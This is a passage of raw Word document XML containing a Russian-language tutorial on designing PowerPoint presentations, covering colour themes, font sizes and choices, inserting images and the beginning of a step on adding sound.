          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эффекты</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стили фона</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно добиться изменения цветового решения выбранной темы.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Темы для презентации MicrosoftPowerPoint можно создать и самостоятельно, используя собственные рисунки и фотографии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полезный совет:</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Текст должен контрастировать с фоном, иначе слайд будет плохо читаем.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не следует делать слайды слишком п</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>стрыми и разрозненными по цветовому решению. Это вредит формированию неустойчивых зрительных образов.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование на слайдах тр</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>х-четыр</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>х цветов благоприятно влияет на концентрацию внимания и улучшает восприятие.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerPoint позволяет выбирать и изменять тип, размер и цвет шрифта. Работа с текстом презентации строится на тех же принципах, что и работа в MicrosoftOfficeWord.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1816950" cy="1493947"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="24841" name="Рисунок 24841" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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41" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image163.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId502" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1821431" cy="1497631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбор шрифта для презентации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы написать текст, надо поставить курсор в поле </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Заголовок слайда</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Текст слайда</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, затем на вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Главная</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> перейти в группу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шрифт</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, где выбрать шрифт, его размер и цвет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полезный совет:</w:t>
      </w:r>
      <w:r w:rsidR="00577AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При разработке презентации важно учитывать, что материал на слайде можно разделить на главный и дополнительный. Главный необходимо выделить, чтобы при демонстрации слайда он н</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с основную смысловую нагрузку: размером текста или объекта, цветом, спецэффектами, порядком появления на экране. Дополнительный материал предназначен для подч</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ркивания основной мысли слайда.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Уделите особое внимание такому моменту, как </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>читаемость</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> слайда. Для разных видов объектов рекомендуются разные размеры шрифта. Заголовок слайда лучше писать размером шрифта 22-28, подзаголовок и подписи данных в диаграммах – 20-24, текст, подписи и заголовки осей в диаграммах, информацию в таблицах – 18-22.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выделения заголовка, ключевых слов используйте полужирный или подч</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ркнутый шрифт. Для оформления второстепенной информации и комментариев – курсив.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы повысить эффективность восприятия материала слушателями, помните о </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>принципе шести</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: в строке – шесть слов, в слайде – шесть строк.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используйте шрифт одного названия на всех слайдах презентации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для хорошей читаемости презентации с любого расстояния в зале текст лучше набирать понятным шрифтом. Этомогутбытьшрифты</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Arial, Bookman Old Style, Calibri, Tahoma, Times New Roman, Verdana.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не выносите на слайд излишне много текстового материала. Из-за этого восприятие слушателей перегружается, нарушая концентрацию внимания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 6. Лучше сто раз увидеть!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для придания презентации PowerPoint наглядности и, если это необходимо, красочности на некоторых слайдах можно разместить различные схемы, графики, фотографии, рисунки, коллажи. Для этого по вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставка</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> необходимо перейти в группу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Иллюстрации</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, щ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">лкнув по выбранной группе иллюстраций. Фотографию или рисунок можно разместить в презентации, используя уже известные команды </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Копировать</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2256150" cy="1477442"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="24861" name="Рисунок 24861" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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61" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image164.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId503" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2260298" cy="1480158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставка изображения в презентацию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полезный совет:</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Старайтесь избегать использования слайда </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>картинка, обтекаемая текстом</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Иллюстрацию лучше разместить на отдельном слайде, подписав под ней основную информацию. Текст в этом случае лучше воспринимается на слух.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставляемые фотографии или картинки должны быть хорошего качества и достаточно большого размера, иначе при растягивании они теряют резкость, чем могут только испортить эффект от презентации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00577AD5" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Презентация MicrosoftOfficePowerPoint имеет более выигрышный вид, если в ней используется звуковое сопровождение. Как же в PowerPoint вставить музыку? По вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставка</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> перейдите в группу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Клипы мультимедиа</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и выберите функцию </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Звук</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. В списке команд, который появится, щ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">лкните </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Звук из файла</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
